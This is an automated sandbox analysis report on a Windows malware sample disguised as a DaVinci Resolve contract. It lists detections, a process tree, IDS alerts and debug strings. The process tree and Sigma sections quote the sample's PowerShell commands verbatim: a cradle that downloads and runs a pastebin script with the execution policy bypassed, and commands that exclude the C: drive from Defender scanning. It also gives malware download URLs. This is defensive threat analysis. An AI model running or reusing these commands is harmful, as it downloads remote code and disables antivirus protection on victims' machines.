Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Editing.exe

Overview

General Information

Sample name: Editing.exe
renamed because original name is a hash value
Original sample name:[DaVinci Resolve] 2025 Contract Innovation, Creativity, Collaboration for the Future of Video Editing.exe
Analysis ID:1617330
MD5:1c452228e454c9478dd76e6c77e635ff
SHA1:04d14a300f25a784affeeb7e0f5f897abcb3585e
SHA256:13460f0abf2ca0f422034226fba37f877ee68c724f367f953e89519f32822ae7
Tags:exeWHKzW2nruser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Editing.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\ Editing.exe" MD5: 1C452228E454C9478DD76E6C77E635FF)
    • powershell.exe (PID: 4560 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5908 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 2052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 2168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD5A5.tmp" "c:\Users\user\AppData\Local\Temp\fri53hgi\CSCED018B8952BA4EF4818E245D55BA92D6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 1088 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4560, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", ProcessId: 2052, ProcessName: csc.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4560, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 5908, ProcessName: powershell.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5908, TargetFilename: C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ Editing.exe", ParentImage: C:\Users\user\Desktop\ Editing.exe, ParentProcessId: 6244, ParentProcessName: Editing.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4560, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline", ProcessId: 2052, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T18:58:32.456652+010028033053Unknown Traffic192.168.2.649778172.67.74.15280TCP
2025-02-17T18:58:32.941027+010028033053Unknown Traffic192.168.2.651663208.95.112.180TCP
2025-02-17T18:58:33.979451+010028033053Unknown Traffic192.168.2.651668149.154.167.220443TCP
2025-02-17T18:58:56.358630+010028033053Unknown Traffic192.168.2.65168289.23.97.21480TCP
2025-02-17T18:58:56.378249+010028033053Unknown Traffic192.168.2.65168189.23.97.21480TCP
2025-02-17T18:59:17.865537+010028033053Unknown Traffic192.168.2.65181089.23.97.21480TCP
2025-02-17T18:59:17.869320+010028033053Unknown Traffic192.168.2.65181189.23.97.21480TCP
2025-02-17T18:59:39.250300+010028033053Unknown Traffic192.168.2.65187689.23.97.21480TCP
2025-02-17T18:59:39.250336+010028033053Unknown Traffic192.168.2.65187589.23.97.21480TCP
2025-02-17T19:00:00.703812+010028033053Unknown Traffic192.168.2.65187989.23.97.21480TCP
2025-02-17T19:00:00.735060+010028033053Unknown Traffic192.168.2.65188089.23.97.21480TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T18:58:33.979451+010018100071Potentially Bad Traffic192.168.2.651668149.154.167.220443TCP
2025-02-17T19:00:01.414848+010018100071Potentially Bad Traffic192.168.2.651881149.154.167.220443TCP
2025-02-17T19:00:01.415857+010018100071Potentially Bad Traffic192.168.2.651882149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T18:58:17.861532+010018100002Potentially Bad Traffic192.168.2.649706104.20.3.235443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://89.23.97.214/TeamBuild/win64_svchost.exeAvira URL Cloud: Label: malware
Source: http://89.23.97.214/TeamBuild/win32_svchost.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Editing.exeReversingLabs: Detection: 51%
Source: Editing.exeVirustotal: Detection: 50%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51668 version: TLS 1.2
Source: Editing.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdbhP source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Editing.exe, Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3213770399.00000284CF971000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Editing.exe, 00000000.00000002.3214493572.00000284CFE00000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3210892163.00000244364D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Editing.exe, 00000000.00000002.3215920817.00000284D08B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3215900196.00000284D08A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmp
